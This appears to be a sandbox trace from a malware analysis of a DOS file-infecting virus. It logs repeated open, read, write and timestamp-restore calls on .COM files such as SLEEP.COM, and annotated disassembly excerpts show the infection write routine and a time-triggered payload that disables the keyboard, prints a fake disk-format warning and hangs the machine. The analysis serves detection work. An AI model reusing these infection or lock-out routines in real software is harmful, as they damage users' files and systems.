2018-12-25T12:43:30.996640235Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.998362484Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.00608673Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.008041851Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.015827688Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.026212982Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.029971626Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.031293462Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.038209927Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.047852708Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.054410394Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.056525786Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.062879399Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.064524379Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.06729021Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.076374928Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.077668123Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.081839532Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.083475675Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.08856907Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.094764547Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.096999958Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.097927222Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.10141796Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.108024875Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.113528488Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.114649871Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.117077522Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.118221846Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.140895644Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.313098687Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.316421633Z 78 PC: 12c06 | Find first file
2018-12-25T12:43:31.322505362Z 78 PC: 12c06 | Find first file (See above)
2018-12-25T12:43:31.333737511Z 78 PC: 12b97 | Find first file
; Linear disassembly from the return address of INT 21h AH=2Ch (Get time, logged as op 44): a time-based trigger check.
; Get time returns CH = hour and CL = minute, so the first instruction (cmp ch, cl) tests whether hour equals minute.
; In this run the next trace row is Display string at PC 12cdb, so the branch was taken and the routine below executed.
2018-12-25T12:43:31.344579596Z 44 PC: 12cc5 | Get time 0x12cc5: cmp ch, cl
0x12cc7: je 0x12cca  ; equal: continue into the routine below
0x12cc9: ret  ; not equal: return to the caller
0x12cca: cli
0x12ccb: mov al, 0xad
0x12ccd: out 0x64, al  ; port 0x64 is the keyboard-controller command port; 0xAD is its "disable keyboard" command
0x12ccf: nop
0x12cd0: sti
0x12cd1: mov dx, di
0x12cd3: add dx, 0x218  ; DS:DX = string at DI+0x218
0x12cd7: mov ah, 9
0x12cd9: int 0x21  ; DOS function 09h: print a '$'-terminated string (the text captured in the next trace row)
0x12cdb: cli
0x12cdc: jmp 0x12cdc  ; jump-to-self with interrupts disabled: the machine hangs; no disk access occurs on this path before the hang
; Not reachable by fall-through. "add word ptr [bx], di" encodes as 01 3F and "aas" as 3F (ASCII '?'),
; so these are probably data bytes decoded as instructions (TODO confirm against the raw bytes).
0x12cde: add word ptr [bx], di
0x12ce0: aas
0x12ce1: aas
0x12ce2: aas
0x12ce3: aas
0x12ce4: aas
2018-12-25T12:43:31.347256504Z 9 PC: 12cdb | Display string (String= ' WARNING: ALL DATA ON NON-REMOVABLE DISK DRIVE C: WILL BE LOST! Proced with Format (Y/N)? Yes Ok')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":1,"Second":0,"TimeBased":true,"OriginalID":15470,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:30.416409908Z 26 PC: 12aa4 | Set disk transfer address
2018-12-25T12:43:30.418535183Z 78 PC: 12ab7 | Find first file
2018-12-25T12:43:30.425993462Z 47 PC: 12abd | Get disk transfer address
2018-12-25T12:43:30.427248282Z 67 PC: 12c43 | Get or set file attributes
2018-12-25T12:43:30.434490566Z 67 PC: 12c4b | Get or set file attributes
2018-12-25T12:43:30.449738712Z 61 PC: 12c51 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:30.457089152Z 87 PC: 12c58 | Get or set file date and time
2018-12-25T12:43:30.459191378Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:43:30.466162416Z 66 PC: 12b19 | Move file pointer
; Linear disassembly from the return address of INT 21h AH=2Ch (Get time, logged as op 44).
; Trace context: this code runs between the 4-byte read and the 666-byte write on each opened .COM file.
; The first instruction (xor cx, dx) mixes the returned time registers: CX = hour:minute, DX = second:hundredths.
2018-12-25T12:43:30.467818606Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl  ; fold the mixed time value into one byte in CH
0x12a72: mov byte ptr [di + 0x10], ch  ; store that byte at [DI+0x10]; presumably a key for the routine called next (TODO confirm)
0x12a75: call 0x22a4e  ; NOTE(review): a 16-bit near call wraps inside the segment, so the real target is likely 0x12a4e; its body is not in this listing
0x12a78: pop bx  ; BX is overwritten by the popaw that follows
0x12a79: popaw  ; presumably pairs with a pushaw before this window
0x12a7a: mov ah, byte ptr [di + 9]  ; DOS function number read from memory, not an immediate; the next trace row logs it as op 64 (40h, Write)
0x12a7d: mov cx, 0x29a  ; 0x29A = 666 bytes, the length logged for the write that follows
0x12a80: nop
0x12a81: mov dx, di  ; DS:DX = buffer starting at DI
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e  ; same routine again after the write; consistent with undoing a symmetric transform in memory (TODO confirm)
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
; The instructions after the ret are outside this routine; the window shows only their first bytes.
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6  ; NOTE(review): pop / sub 6 / push looks like deriving a base address from a return address; verify against the full disassembly
0x12a92: push si
2018-12-25T12:43:30.470726795Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:43:30.482022805Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:43:30.484000907Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:43:30.492128665Z 87 PC: 12b60 | Get or set file date and time
2018-12-25T12:43:30.498835683Z 62 PC: 12b66 | Close file
2018-12-25T12:43:30.505592678Z 67 PC: 12b6d | Get or set file attributes
2018-12-25T12:43:30.517067035Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.520626688Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.521996793Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.528582665Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.542097706Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.556927592Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.558656275Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.569486504Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.571118215Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.573824195Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.583714764Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.585636401Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.593396988Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.596109194Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.604893671Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.615809207Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.619697905Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.621171231Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.627450655Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.639276333Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.648030975Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.650015948Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.657549802Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.6602285Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.663127088Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.672537162Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.675213826Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.682397385Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.684107251Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.693250066Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.705624834Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.708773478Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.711629142Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.718295523Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.729425337Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.737505402Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.739447853Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.746895789Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.748678697Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.752159187Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.761701572Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.764476366Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.77337394Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.775411152Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.784498656Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.792729314Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.794876152Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.796230119Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.800667355Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.807668391Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.815799728Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.818108569Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.822846908Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.825566864Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.829387911Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.838334531Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.839530913Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.844905454Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.846983189Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.856052274Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.867379628Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.871763243Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.873145344Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.879930789Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.896264743Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.909405487Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.911233433Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.919691196Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.921442775Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.924483383Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.935335187Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.93719673Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.944765679Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.947307482Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.956857075Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.967829775Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.972369817Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.973846063Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.985884518Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.99791211Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.006966451Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.009297012Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.017382206Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.020184812Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.023529336Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.034753424Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.037356285Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.045659619Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.047882499Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.058364169Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.070938699Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.074245801Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.076820378Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.083479093Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.094578289Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.108957031Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.110822066Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.118470445Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.120718877Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.129857958Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.14113696Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.143902523Z 78 PC: 12c06 | Find first file
2018-12-25T12:43:31.151205249Z 78 PC: 12c06 | Find first file (See above)
2018-12-25T12:43:31.157904118Z 78 PC: 12b97 | Find first file
; Time-triggered payload, annotated for analysis. The PC in the trace entry below is the
; return address of int 21h "Get time" (AH=2Ch), which returns CH=hour and CL=minute.
2018-12-25T12:43:31.17019417Z 44 PC: 12cc5 | Get time 0x12cc5: cmp ch, cl    ; trigger test: hour == minute?
0x12cc7: je 0x12cca    ; equal -> payload
0x12cc9: ret    ; otherwise return with no visible effect
0x12cca: cli    ; mask interrupts while the controller is programmed
0x12ccb: mov al, 0xad    ; 0xAD = 8042 "disable keyboard interface" command
0x12ccd: out 0x64, al    ; port 0x64 = keyboard controller command port
0x12ccf: nop
0x12cd0: sti
0x12cd1: mov dx, di
0x12cd3: add dx, 0x218    ; DX = DI + 0x218, offset of the message text
0x12cd7: mov ah, 9    ; int 21h AH=09h: print '$'-terminated string at DS:DX
0x12cd9: int 0x21
0x12cdb: cli
0x12cdc: jmp 0x12cdc    ; jumps to itself with interrupts masked: the machine hangs here
; No disk write or format call appears in this excerpt; the visible effect is keyboard
; lock-out, a message, and a hang.
; NOTE(review): the bytes below follow an unconditional self-jump and are not reached by
; fall-through. `aas` is opcode 0x3F (ASCII '?'), so this is probably data decoded as code.
0x12cde: add word ptr [bx], di
0x12ce0: aas
0x12ce1: aas
0x12ce2: aas
0x12ce3: aas
0x12ce4: aas
; In this run the next recorded call is "Set disk transfer address", not "Display string",
; so the je appears not to have been taken.
2018-12-25T12:43:31.173619185Z 26 PC: 12ad6 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15470,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:30.761997065Z 26 PC: 12aa4 | Set disk transfer address
2018-12-25T12:43:30.763874461Z 78 PC: 12ab7 | Find first file
2018-12-25T12:43:30.769721111Z 47 PC: 12abd | Get disk transfer address
2018-12-25T12:43:30.771090132Z 67 PC: 12c43 | Get or set file attributes
2018-12-25T12:43:30.77796513Z 67 PC: 12c4b | Get or set file attributes
2018-12-25T12:43:30.79426787Z 61 PC: 12c51 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:30.8018146Z 87 PC: 12c58 | Get or set file date and time
2018-12-25T12:43:30.804484176Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:43:30.811066268Z 66 PC: 12b19 | Move file pointer
; Infection write path, annotated for analysis. The PC in the trace entry below is the
; return address of int 21h "Get time" (AH=2Ch): CH=hour, CL=minute, DH=second, DL=1/100 s.
2018-12-25T12:43:30.812755372Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx    ; fold the four time fields together
0x12a70: xor ch, cl    ; reduce to one byte in CH
0x12a72: mov byte ptr [di + 0x10], ch    ; store the time-derived byte at [di+0x10] (presumably a per-copy key; confirm in the called routine)
0x12a75: call 0x22a4e    ; NOTE(review): a rel16 call wraps inside the 64 KiB segment, so the real target is presumably 0x12a4e
0x12a78: pop bx    ; drops one word from the stack (its origin is not visible in this excerpt)
0x12a79: popaw    ; restores registers, presumably saved by a pushaw before this excerpt
0x12a7a: mov ah, byte ptr [di + 9]    ; DOS function number read from memory, not an immediate; the trace records it as 64 (0x40, write)
0x12a7d: mov cx, 0x29a    ; 0x29a = 666 bytes, the length in the trace's "Write 666 bytes"
0x12a80: nop
0x12a81: mov dx, di    ; buffer = DS:DI
0x12a83: int 0x21    ; the trace records this call as a 666-byte write on handle 5
0x12a85: pushaw
0x12a86: call 0x22a4e    ; same routine again after the write; presumably undoes the transform on the in-memory copy
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
; Detection note: if [di+0x10] is a key, each written copy differs in its transformed
; bytes, so signatures should be anchored on code that stays constant - TODO confirm.
; The instructions below follow the ret and belong to another routine cut off by the excerpt.
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6
0x12a92: push si
2018-12-25T12:43:30.815395001Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:43:30.825256398Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:43:30.826911318Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:43:30.833655825Z 87 PC: 12b60 | Get or set file date and time
2018-12-25T12:43:30.838990777Z 62 PC: 12b66 | Close file
2018-12-25T12:43:30.846767422Z 67 PC: 12b6d | Get or set file attributes
2018-12-25T12:43:30.857121869Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.861734675Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.863134685Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.869212794Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.880699042Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.892412457Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.894792177Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.901884595Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.903703846Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.906417398Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.915127809Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.916909746Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.923585763Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.925596321Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.95091996Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.96133326Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.964714311Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.966611867Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.972671986Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.982883826Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.991066481Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.992690562Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.999293834Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.001996136Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.004660548Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.013205453Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.015655157Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.022379696Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.024118118Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.033105155Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.043152544Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.045997523Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.048065095Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.054531862Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.064020627Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.074525594Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.076020971Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.082299326Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.084342096Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.086662385Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.09503133Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.097242879Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.104178311Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.105658167Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:31.222761902Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:31.403037558Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:31.406217336Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:31.408089795Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:31.415186344Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:31.609656046Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:31.617120513Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:31.618757825Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:31.622994883Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:31.623964602Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:31.626880358Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:31.804691181Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:31.806684975Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:31.816183071Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:31.818391252Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:32.0503607Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:32.132421792Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:32.134957255Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:32.135972486Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:32.141816475Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:32.151208317Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:32.162751187Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:32.164562496Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:32.170694769Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:32.172059903Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:32.174728752Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:32.183515637Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:32.184836944Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:32.191501314Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:32.192940957Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:32.200556285Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:32.210381024Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:32.212866186Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:32.213908898Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:32.219784661Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:32.229637596Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:32.236175945Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:32.238731941Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:32.245353287Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:32.247065429Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:32.250588335Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:32.259251426Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:32.260821065Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:32.268195469Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:32.269736696Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:32.27728067Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:32.287457497Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:32.290617637Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:32.291582603Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:32.297388433Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:32.306693507Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:32.31291466Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:32.314480628Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:32.320559921Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:32.321850004Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:32.328998486Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:32.338500418Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:32.34003801Z 78 PC: 12c06 | Find first file
2018-12-25T12:43:32.343965031Z 78 PC: 12c06 | Find first file (See above)
2018-12-25T12:43:32.35485774Z 78 PC: 12b97 | Find first file
; Time-triggered payload, annotated for analysis. The PC in the trace entry below is the
; return address of int 21h "Get time" (AH=2Ch), which returns CH=hour and CL=minute.
2018-12-25T12:43:32.360621141Z 44 PC: 12cc5 | Get time 0x12cc5: cmp ch, cl    ; trigger test: hour == minute?
0x12cc7: je 0x12cca    ; equal -> payload
0x12cc9: ret    ; otherwise return with no visible effect
0x12cca: cli    ; mask interrupts while the controller is programmed
0x12ccb: mov al, 0xad    ; 0xAD = 8042 "disable keyboard interface" command
0x12ccd: out 0x64, al    ; port 0x64 = keyboard controller command port
0x12ccf: nop
0x12cd0: sti
0x12cd1: mov dx, di
0x12cd3: add dx, 0x218    ; DX = DI + 0x218, offset of the message text
0x12cd7: mov ah, 9    ; int 21h AH=09h: print '$'-terminated string at DS:DX
0x12cd9: int 0x21
0x12cdb: cli
0x12cdc: jmp 0x12cdc    ; jumps to itself with interrupts masked: the machine hangs here
; No disk write or format call appears in this excerpt; the visible effect is keyboard
; lock-out, a message, and a hang.
; NOTE(review): the bytes below follow an unconditional self-jump and are not reached by
; fall-through. `aas` is opcode 0x3F (ASCII '?'), so this is probably data decoded as code.
0x12cde: add word ptr [bx], di
0x12ce0: aas
0x12ce1: aas
0x12ce2: aas
0x12ce3: aas
0x12ce4: aas
; In this run the payload fired: the next trace entry is "Display string" at PC 12cdb,
; the return address of the int 0x21 above, and it is the last entry recorded for the run.
